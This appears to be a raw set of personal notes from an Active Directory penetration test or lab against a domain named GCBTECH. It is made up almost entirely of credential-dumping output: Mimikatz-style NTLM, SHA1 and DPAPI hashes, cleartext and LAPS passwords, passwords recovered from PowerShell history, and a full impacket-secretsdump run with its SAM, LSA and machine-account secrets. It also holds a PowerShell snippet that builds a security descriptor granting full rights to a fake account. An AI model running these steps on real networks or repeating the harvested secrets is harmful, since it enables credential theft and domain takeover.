Username : appmanager
	 * Domain   : IT
	 * NTLM     : 2c5d4678b83e5de26dc0338a0fcf6245
	 * SHA1     : 18cb4d7cb7e5aa891ef9f4f44c846a491999ede4
	 * DPAPI    : cc49271d0c4e173c4acdabba341b7e69

Got creds from edge

UserName    Resource              Password       
--------    --------              --------       
root        <http://192.168.4.111/> BugTrackerL0g1n
itemployees <http://192.168.4.111/> ReadOnlyAccess

LAPS On IT-APPSRV01

username: Administrator
password: (4E01+)$-L[3m9

image.png

Got sqlsvc hash from keytab file.

username: sqlsvc
hash: 7782d820e5e5952b20b77a2240a03bbc

image.png

I’m Cooked No waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaay

Found creds in powershell history

powershell -ep bypass $passwd = ConvertTo-SecureString "Vend0r'sDatabaseSecret"-AsPlainText -Force
powershell -ep bypass $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

image.png

Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses "192.168.4.2", "192.168.250.1"
examuser
Id70+#1C+;33{/
00000003] Primary
	 * Username : techadmin
	 * Domain   : GCBTECH
	 * NTLM     : 85fea8c3730ce6ccce8c52c58854ed8e
	 * SHA1     : bad0edffa3c5ad6be639ae224ed5f5aee6e261c1
	 * DPAPI    : 9aaaa1e7720c6d06a40fcce718035daf
Fake01 sid
S-1-5-21-1265556501-975517518-3548124796-8101

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1265556501-975517518-3548124796-8101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
msv :	
	 [00000003] Primary
	 * Username : sqladmin
	 * Domain   : GCBTECH
	 * NTLM     : 41eb70e78aef6778c507773770fcf780
	 * SHA1     : 1e476b9e69778cafca7a4c45dd44b147438ae0ac
	 * DPAPI    : 914d7e0c9c9d4a9a9d19473d7a9fa6ab
	tspkg :	
	wdigest :	
	 * Username : sqladmin
	 * Domain   : GCBTECH
	 * Password : (null)
	kerberos :	
	 * Username : sqladmin
	 * Domain   : GCBTECH.LOCAL
	 * Password : P@ssforDBServer1
┌──(remo㉿Remo)-[~/Server]
└─$ impacket-secretsdump gcbtech.local/'sqladmin':'P@ssforDBServer1'@172.16.11.4                     
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x98a06e754f0c627c1466a1c3ca55431f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:40927ede7a0c75c55acad0699d36712d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:65c30c7139b564de8357dd82e2e97e40:::
[*] Dumping cached domain logon information (domain/username:hash)
GCBTECH.LOCAL/sqladmin:$DCC2$10240#sqladmin#5a34bb39bce9d48b2bfb84bfbe9792e9: (2025-05-10 10:23:03)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
GCBTECH\\GCBTECH-SQL$:aes256-cts-hmac-sha1-96:8ded49b2b4e2d180cfaf1db70b281d7fde3c80dd0a7dd89ee9e4bf7ad1baefed
GCBTECH\\GCBTECH-SQL$:aes128-cts-hmac-sha1-96:5ba855f66c5b84d2fcbbb3ddd24408d4
GCBTECH\\GCBTECH-SQL$:des-cbc-md5:9b3475499ddf6749
GCBTECH\\GCBTECH-SQL$:plain_password_hex:08dc010253bad3bdbe26bb9484e11fd1769db29ade7b2ba98042f9cb485ab5da6d5f7e1aaf0621044a6f93c65f9b83c3c56eba79285689dd275d6e106e9ac480cf130b4315f236242921ccd8b6f162b5ba3a3d29cea344ac25f529de07ed9b60d6bbf636a91321a1a8f5a0888d97beaa762d1ec882cc40c9a201b783ca17690ea1dfe8dab0873151bdc353c829564582ca86211345ca0290839f120ac31343a2f064e880f97609e2b29483b7aa06ef83004f227b23ee724f8bb791882bbbdd4c146432c7210138627b31c6dce701570af84c811f7f7d5c00feba5bea252e97142cd48fb9be44180dc822ceb7883285d6
GCBTECH\\GCBTECH-SQL$:aad3b435b51404eeaad3b435b51404ee:8db46467a82fada77d7140a23689b1bb:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x1f0e5b87f833bca8a56e5e1e2f89a05b5755808b
dpapi_userkey:0xa6acb9962392c033ca079ba74b32474e6a6531f8
[*] NL$KM 
 0000   13 CB 6B A7 F5 1E A5 FC  8D 4F 2E 34 6F 4E 41 11   ..k......O.4oNA.
 0010   7C D7 16 E5 79 77 1A 95  7A C0 01 65 7B C5 88 60   |...yw..z..e{..`
 0020   27 AC 55 FC AD DD 07 2B  DC 82 45 7B 4C 65 BA 9F   '.U....+..E{Le..
 0030   DD 69 9C 69 77 35 49 E8  A1 70 A2 56 D0 F5 8D 67   .i.iw5I..p.V...g
NL$KM:13cb6ba7f51ea5fc8d4f2e346f4e41117cd716e579771a957ac001657bc5886027ac55fcaddd072bdc82457b4c65ba9fdd699c69773549e8a170a256d0f58d67
[*] Cleaning up... 
[*] Stopping service RemoteRegistry